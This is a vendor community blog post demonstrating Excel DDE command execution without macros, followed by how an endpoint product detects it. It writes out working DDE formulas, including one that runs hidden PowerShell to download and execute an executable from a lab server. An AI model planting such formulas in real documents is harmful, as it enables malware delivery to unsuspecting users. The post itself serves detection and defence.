This website uses cookies. By clicking Accept, you consent to the use of cookies. Click Here to learn more about how we use cookies.
Accept
Reject
Register Now
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 
NetWitness Community Blog
Subscribe to the official NetWitness Community blog for information about new product features, industry insights, best practices, and more.
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 

MS Excel Command Execution Without Macros

HalimAbouzeid
Respected Contributor Respected Contributor
Respected Contributor
‎2017-10-16 04:16 PM

There has recently been a reappearance of a method used to execute commands via malicious Excel files (and other office documents) without the need of Macros.

The method uses Dynamic Data Exchange (DDE), and what makes it interesting is that, even though it does causes prompt messages to appear, it doesn't use Macros and therefore it is less likely to be detected and blocked, and users are more likely to accept the prompts. In addition, as this is a "feature" and not a vulnerability, it is not something that will be patched, and cannot be easily prevented and blocked.

 

We will see how to perform a sample attack using DDE and then how easily it can be detected with RSA NetWitness Endpoint.

 

DDE Sample Attack

To execute a command using DDE, all we have to do is create an Excel file and use the following formula in one of the cells:

=cmd|' /c notepad'!A0

Once the user opens the file and accepts the prompts, notepad.exe will be launched.

 

To make the attack more interesting, we want to use the same method in conjunction with PowerShell to download and execute our payload (the payload "YGH.exe" is hosted on the "192.168.1.3" server):

=cmd|'/c powershell.exe -w hidden (New-Object System.Net.WebClient).DownloadFile(\"http://192.168.1.3/YGH.exe\",\"c:\\Users\Public\\YGH.exe\");Start-Process \"c:\\Users\\Public\\YGH.exe\"'!A0

 

Once the victim opens the file, this is what he sees:

dde-1.PNG

 

After accepting the 1st warning message, he sees a 2nd warning:

dde-2.PNG

 

And finally the payload gets downloaded and executed:

dde-3.PNG

 

 

In a real life scenario, the malware would have done something more stealthy, or provided remote access to the attacker instead of displaying a message.

 

 

 

 

Detection Using RSA NetWitness Endpoint

Now, from the RSA NetWitness Endpoint view, this would be detected very easily.

dde-nwe.png

 

  1. IIOCs are triggered for Office running PowerShell and PowerShell downloading content. This could be used to generate real-time alerts via email and/or Syslog and get notified at an early stage of the attack.
  2. Excel is executed
  3. Excel launches "cmd.exe". From the command arguments we can see that cmd is used to launch powershell to download and execute a file called "YGH.exe" from the "192.168.1.3" server.
  4. PowerShell saves the YGH.exe file to disk
  5. PowerShell executed the YGH.exe file

 

 

 

This shows how an attack vector that can easily bypass traditional preventive solutions can be detected by RSA NetWitness Endpoint based on the monitored behavior of the user's workstation.

This has been detected even though Excel is an approved software with a valid trusted signature and the malware itself didn't perform any malicious activity (it only shows a message to the victim). It demonstrates early detection capabilities based on behavior before negative impact actually happens.

1 Comment
© 2022 RSA Security LLC or its affiliates. All rights reserved.